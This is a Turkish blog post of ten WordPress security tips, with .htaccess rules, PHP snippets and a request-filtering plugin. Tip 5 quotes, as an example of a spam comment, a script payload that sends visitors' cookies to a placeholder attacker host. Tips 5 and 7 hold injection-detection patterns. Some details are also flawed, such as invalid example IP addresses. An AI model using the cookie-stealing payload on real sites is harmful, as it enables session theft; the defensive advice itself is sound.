10 Kullanışlı WordPress Güvenlik Hilesi

İnternet üzerinden yaptığımız her şey için güvenliğimiz olsun isteriz. Aynı zamanda, paylaştıklarımızın bize özel kalması ve başkaları tarafından kullanılmaması bir o kadar da önemlidir. Peki, web sitesi veya blog hazırlarken kullandığımız platformlar bunu ne derece destekliyor?
Tabi ki her platformun güvenlik konusunda kendine göre güçlü ve zayıf noktaları var. Bunları aşmak ne derece mümkün?

İşte WordPress tabanlı oluşturulan web siteleri ve bloglar için 10 kolay güvenlik hilesi:

1. Gereksiz Bilgilerin Gözükmesini Engelleyin

WordPress hesabınıza bağlanmak istediğinizde CMS (İçerik Yönetim Sistemi) size hata verebilir ve bunun nedenini de açıklar. İyi ihtimalle, şifrenizi unutmuşsunuzdur. Başka bir ihtimal ise, hesabınızı ele geçirmek isteyen kişiler olabilir.
Bağlantı hataları koduna bağlı olarak bir kod ile bu sorundan kurtulabilirsiniz. Bunun için içeriğinizde yer alan functions.php dosyasını açın ve aşağıda yazan kodu yerleştirin:

add_filter(‘login_errors’,create_function(‘$a’, “return null;”));

Dosyayı bu haliyle kaydettiğiniz takdirde bir daha oturum açarken hata mesajı almazsınız.

2. SSL Kullanın

SSL, Secure Sockets Layer açılımına sahip bir protokoldür. Türkçe’ye Güvenli Yuva Katmanı olarak çevrilebilir ve güvenlik amacıyla kullanılır. İnternet üzerinden şifre ile gerçekleştirdiğiniz her işlemi, kendisi de şifreleyerek iletir ve böylece gizlilik gerektiren tüm işlemlerinizi gönül rahatlığıyla gerçekleştirebilirsiniz.
SSL’in web üzerinde aktif olup olmadığını tarayacınızın herhangi bir yerde gözüken asmakilit simgesi ile anlayabilirsiniz. Ayrıca, bu simgeye çift tıklayarak kullanılan SSL Sertifikası’nın kimden alındığı, geçerlilik süresi gibi bilgilere ulaşabilirsiniz.
Eğer web sunucunuz SSL kullanımını destekliyorsa, WordPress ile oluşturulmuş site ve bloglarda rahatlıkla etkinleştirilebilir. Bunun için, WordPress donanımındaki döngülerde yer alan wp-config.php dosyasını açıp;

define(‘FORCE_SSL_ADMIN’, true);

kodunu yerleştirmeniz yeterli. Dosyayı kaydettiğiniz zaman SSL Sertifikasını WordPress yazılımınıza yüklemiş olacaksınız.

3. .htaccess Kullanın

WordPress kullanıcıları için wp-config.php dosyası en önemli dosyalardan biridir, çünkü bu dosya veritabanınıza ulaşabilmeniz için gereken kullanıcı adınız, parolanız gibi bütün hayati bilgileri içerir.

.htaccess dosyası ise istenmeyen kişilerin dosyalarınıza ulaşmasını engelleyen en başarılı dosyadır. Bu dosya wp-config.php dosyası gibi WordPress donanımındaki döngüde yer alır ve mutlaka orijinal halinin bir yedeği bulunmalıdır. wp-admin.php dosyasına kötü niyetli yazılımların erişmesini engellemek için aşağıdaki kodu .htaccess dosyasının bir kopyasına yerleştirin:

<files wp-config.php>
order allow,deny
deny from all
</files>

4. İstenmeyen Kişileri ve Yazılımları Kara Listeye Alın

Blogunuzda spam niteliğindeki yorumlara eminim ki çok sık rastlıyorsunuzdur. Spam yorumları yazan yazılımların veya kişilerin erişimini engelleyerek bu sorundan kolayca kurtulabilirsiniz. Bunun için spam mesajları gönderen bilgisayarın IP adresini bilmeniz yeterli.

Örnek olarak; 424.546.768 IP adresi bizim erişimini engellemek istediğimiz IP adresi olsun.

.htaccess dosyasının orijinalinin bir kopyasını alın ve şu kodu ekleyin:

<Limit GET POST PUT>
order allow,deny
allow from all
deny from 424.546.768
</LIMIT>

Bu kod, blogunuza 424.546.768 IP adresi dışında herkesin girebileceğini belirtir. Daha fazla kişiyi engellemek için bu kodu tekrar tekrar yazmaya gerek yok. Örnek olarak: 583.964.694 ve 967.694.375 IP adreslerini de engellemek isteyelim. Bu durumda;

<Limit GET POST PUT>
order allow,deny
allow from all
deny from 424.546.768
deny from 583.964.694
deny from 967.694.375
</LIMIT>

kodumuz bu şekli alır. Yani, her adres için bir satır eklememiz yeterli.

5. Blogunuzu Gereksiz Kodlara Karşı Koruyun

Burada bahsedilen gereksiz kodlar, çeşitli paylaşımlarınızın altındaki yorumlarda bulunan kodlardır. Örneğin;

Güzel ve yararlı bir paylaşım olmuş, teşekkürler.<script>document.location=’http://some_attacker/cookie.cgi?’ +document.cookie</script>

Bu ve buna benzer, kod içeren yorumlar genelde kötü niyetli yazılımlar tarafından yapılmıştır. Bu nedenle bundan korunmak önemlidir.

.htaccess dosyasını kullanarak bu tarz yazılımların blogumuza ulaşmasını engelleyebiliriz. Aşağıda yazan kodun esas olarak yaptığı, yorumda <script> içerip içermediği ve bu yorumun kötü niyet içerip içermediğini kontrol etmektir.

Options +FollowSymLinks
RewriteEngine On
RewriteCond %{QUERY_STRING} (\<|%3C).*script.*(\>|%3E) [NC,OR]
RewriteCond %{QUERY_STRING} GLOBALS(=|\[|\%[0-9A-Z]{0,2}) [OR]
RewriteCond %{QUERY_STRING} _REQUEST(=|\[|\%[0-9A-Z]{0,2})
RewriteRule ^(.*)$ index.php [F,L]

Bu kodu yine .htaccess dosyasına yerleştirmemiz gerekiyor. Burada tekrardan bu dosyanın orijinalinin yedeğinin olup olmadığını kontrol etmenin önemli bir nokta olduğunu hatırlatalım. Eğer yazdığımız bu kod, bir yorumdaki bu gereksiz kodların zararlı bir yazılımdan geldiğini tespit ederse yazılım 403 numaralı, “giriş reddedildi/yasak” anlamına gelen hatayı verecek ve blogumuza ulaşamayacaktır.
6.    İçerik Temizleyicilere Karşı Koyun

Zaman içerisinde insanlar web siteniz ya da blogunuzdaki içeriği alıp kullanmaya başlayacaklardır. Bu durumda hotlinking denilen bir durum meydana gelir ki, bu sizin sunucunuzun bant genişliğini doldurmanıza neden olabilir.

Bundan kurtulmak içinse yine .htaccess dosyasına ihtiyacımız var. Bu dosyanın orijinalinin yedeğini aldıysak, aşağıdaki kodu bu dosyaya ekliyoruz:

RewriteEngine On
#Replace ?mysite\.com/ Buraya blogunuzun URL’sini yazmalısınız.
RewriteCond %{HTTP_REFERER} !^http://(.+\.)?mysite\.com/ [NC]
RewriteCond %{HTTP_REFERER} !^$ #Replace /images/nohotlink.jpg nohotlink.jpg yerine “hotlink olmasını istemediğiniz” görselin URL’sini yazın
RewriteRule .*\.(jpe?g|gif|bmp|png)$ /images/nohotlink.jpg [L]

Bu kod ile birlikte dosyayı kaydettikten sonra, kimse sizin resimlerinize link veremeyecek.

7.    Blogunuzu Korumak İçin Bir Eklenti Oluşturun


Hackerlar ve kötü niyetli yazılımlar, öncelikle blogunuzun zayıf noktalarını bulmak için çeşitli yöntemler deneyeceklerdir. WordPress bu konuda iyi bir korumaya sahiptir, ancak yine de bu tarz durumları tamamen engellemez, aşılabilirdir.
Bir “not defteri”ne aşağıdaki kodu yazın ve <em>blockbadqueries.php</em> ismiyle kaydedin:

<?php
/*
Plugin Name: Block Bad Queries
Plugin URI: http://perishablepress.com/press/2009/12/22/protect-wordpress-against-malicious-url-requests/
Description: Protect WordPress Against Malicious URL Requests
Author URI: http://perishablepress.com/
Author: Perishable PressVersion: 1.0
*/
global $user_ID;

if($user_ID) {
if(!current_user_can(‘level_10’)) {
if (strlen($_SERVER[‘REQUEST_URI’]) > 255 ||
strpos($_SERVER[‘REQUEST_URI’], “eval(“) ||
strpos($_SERVER[‘REQUEST_URI’], “CONCAT”) ||
strpos($_SERVER[‘REQUEST_URI’], “UNION+SELECT”) ||
strpos($_SERVER[‘REQUEST_URI’], “base64”)) {
@header(“HTTP/1.1 414 Request-URI Too Long”);
@header(“Status: 414 Request-URI Too Long”);
@header(“Connection: Close”);
@exit;
}
}
}
?>

Sonrasında bu dosyayı, wp-content/plugins dizinine yerleştirin, aktive ettiğinizde diğer eklentiler gibi davranacak ve sizi saldırılardan koruyacaktır.

8.    WordPress’in Hangi Versiyonunu Kullandığınız Gözükmesin

WordPress otomatik olarak hangi versiyonunun kullanıldığını görüntüler. Eğer son versiyonu kullanıyorsanız, bu genel olarak bir sorun teşkil etmez. Eğer son versiyonu kullanmıyorsanız, WordPress bunu yine de görüntüler. Bu önemli bir bilgidir ve blogunuza zarar vermek isteyen kişilerin bunu bilmesi kötü sonuçlara neden olabilir.

Bu numaranın gözükmemesi için temanızın functions.php dosyasına aşağıdaki kodu yerleştirin:

remove_action(‘wp_head’, ‘wp_generator’);

Dosyayı kaydedip, sayfayı yenilediğinizde versiyon bilgisi yok olacaktır.

9.    Kullanıcı Adı “Admin” Olarak Kalmasın

Şifre kırmanın çeşitli yöntemleri vardır, ancak en kolayı değişik şifre kombinasyonlarını denemektir. Bu amaçla, çeşitli yazılım modülleri geliştirilmiştir. Tabi ki şifre tek başına yeterli olmadığı için kullanıcı adının da biliniyor olması, istenmeyen kişilerin kullanıcı adınızı ve şifrenizi kullanarak blogunuza giriş yapmasına neden olacaktır. Bu nedenle size WordPress’in atadığı “admin” kullanıcı adı yerine tahmin etmesi zor bir kullanıcı adı kullanmak gerekir.

WordPress’in 3.0 versiyonunda kullanıcı adını siz seçebiliyorsunuz, bu nedenle burada yazılanlar daha eski versiyonlar için geçerlidir.

Kullanıcı adını değiştirmek için, WordPress Admin Paneli’ne aşağıdaki kodu ekleyebilirsiniz:

UPDATE wp_users SET user_login = ‘Buraya Yeni Kullanıcı Adınızı Yazın’
WHERE user_login = ‘Admin’;

10.    Dizininizin Gözükmesini Engelleyin

Bu da bir güvenlik önlemidir, çünkü www.blogunuz.com/wp-includes adresine giren bir kişi dosyaların ne zaman güncellendiğini görebilir ve onlara erişebilir.

Bunun için aşağıda yazan iki maddeyi de uygulamanız gerekiyor:
• İlk olarak ya boş bir index.html dosyası ekleyin, ya da kopyalanmış .htaccess dosyanızın başına şu satırı ekleyin:

Options All –Indexes

• Blog’unuzun robots.txt dosyasını şununla güncelleyin:

Disallow:/wp*

İ.Y.

Comments

Bir Cevap Yazın

E-posta hesabınız yayımlanmayacak.

yazilan makaleler izinsiz kopyalanamaz aksi taktirde dmca tarafindan gerekli islemler baslatilacaktir.